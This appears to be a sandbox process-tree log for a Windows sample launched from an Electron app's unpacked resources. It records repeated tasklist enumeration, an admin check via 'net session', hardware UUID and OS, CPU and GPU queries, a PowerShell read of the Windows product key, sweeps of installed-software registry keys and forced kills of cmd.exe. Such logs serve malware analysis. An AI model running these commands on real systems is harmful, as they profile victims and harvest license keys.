C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:2304

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:2684

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:2300

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:2660

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:7564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4900

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:8076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4924

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3996

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:8464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:1664

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:8028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3464

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4000

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:2324

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:2492

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3948

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:1228

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3000

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:7852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3672

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4244

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4952

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:7588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4348

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4332

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:8012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3676

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:8248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:5064

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:448

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:1596

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:2844

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:1432

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:628

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3108

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4920

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3564

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4192

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:8560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3896

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:8180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:4016

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:8448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:5128

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:5148

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:7960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:5172

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:7868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "net session"
2⤵
PID:5188

C:\Windows\system32\net.exe
net session
3⤵
PID:7672

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
4⤵
PID:8576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\resources\app.asar.unpacked\bind\main.exe"
2⤵
PID:5212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
2⤵
PID:5240

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
3⤵
PID:8544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
2⤵
PID:5264

C:\Windows\System32\Wbem\WMIC.exe
wmic OS get caption, osarchitecture
3⤵
PID:7996

C:\Windows\system32\more.com
more +1
3⤵
PID:8368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
2⤵
PID:10712

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
3⤵
PID:10752

C:\Windows\system32\more.com
more +1
3⤵
PID:10760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
2⤵
PID:10808

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController get name
3⤵
- Detects videocard installed
PID:10848

C:\Windows\system32\more.com
more +1
3⤵
PID:10856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
2⤵
PID:10900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:10940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"
2⤵
PID:11084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:11124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:3652

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
PID:9300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=2888 get ExecutablePath"
2⤵
PID:11060

C:\Windows\System32\Wbem\WMIC.exe
wmic process where processid=2888 get ExecutablePath
3⤵
PID:10928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
2⤵
PID:11204

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
3⤵
PID:11140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
2⤵
PID:11200

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
3⤵
PID:11116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""
2⤵
PID:11084

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"
3⤵
PID:10376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""
2⤵
PID:9336

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
3⤵
PID:8300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""
2⤵
PID:8736

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
3⤵
PID:9612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:9540

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:5820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""
2⤵
PID:3080

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
3⤵
PID:7756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""
2⤵
PID:9000

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
3⤵
PID:6444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""
2⤵
PID:9428

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
3⤵
PID:6872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""
2⤵
PID:6232

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
3⤵
PID:9368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""
2⤵
PID:9380

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
3⤵
PID:4272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""
2⤵
PID:6024

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
3⤵
PID:2400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""
2⤵
PID:6620

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
3⤵
PID:8360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""
2⤵
PID:3568

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
3⤵
PID:9232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)""
2⤵
PID:9832

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)"
3⤵
PID:5792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""
2⤵
PID:6188

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
3⤵
PID:3196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""
2⤵
PID:9508

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
3⤵
PID:6752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""
2⤵
PID:5292

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
3⤵
PID:6756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""
2⤵
PID:9288

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
3⤵
PID:3948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""
2⤵
PID:5320

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
3⤵
PID:5788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:6888

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:8804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:2660

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:4364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:6580

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:6448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:5252

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:8376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:9800

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:5852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:10032

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:7932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:6052

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:4920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:8204

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:7580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:1784

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:5404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:6604

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:6748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:3204

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:4524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:5016

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:10248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:9168

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:8668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:7268

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:7472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:2712

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:5984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:6520

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:3672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:5512

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:7968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:1540

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:8096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:8748

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:7864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:7688

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:9448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:8380

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:10048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:10356

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:6704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:7840

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:10320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:6512

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:7836

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:10284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM cmd.exe"
2⤵
PID:6328

C:\Windows\system32\taskkill.exe
taskkill /F /IM cmd.exe
3⤵
- Kills process with taskkill
PID:10276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""
2⤵
PID:6500

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"
3⤵
PID:2308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}""
2⤵
PID:5160

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}"
3⤵
PID:11004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}""
2⤵
PID:6556

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}"
3⤵
PID:9060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""
2⤵
PID:6876

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"
3⤵
PID:9476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}""
2⤵
PID:7736

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}"
3⤵
PID:7592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""
2⤵
PID:5876

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"
3⤵
PID:8912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}""
2⤵
PID:4136

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:8256

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}"
3⤵
PID:11028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""
2⤵
PID:9436

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"
3⤵
PID:5144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""
2⤵
PID:10140

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"
3⤵
PID:5836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""
2⤵
PID:6488

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"
3⤵
PID:4124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""
2⤵
PID:5380

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"
3⤵
PID:5636

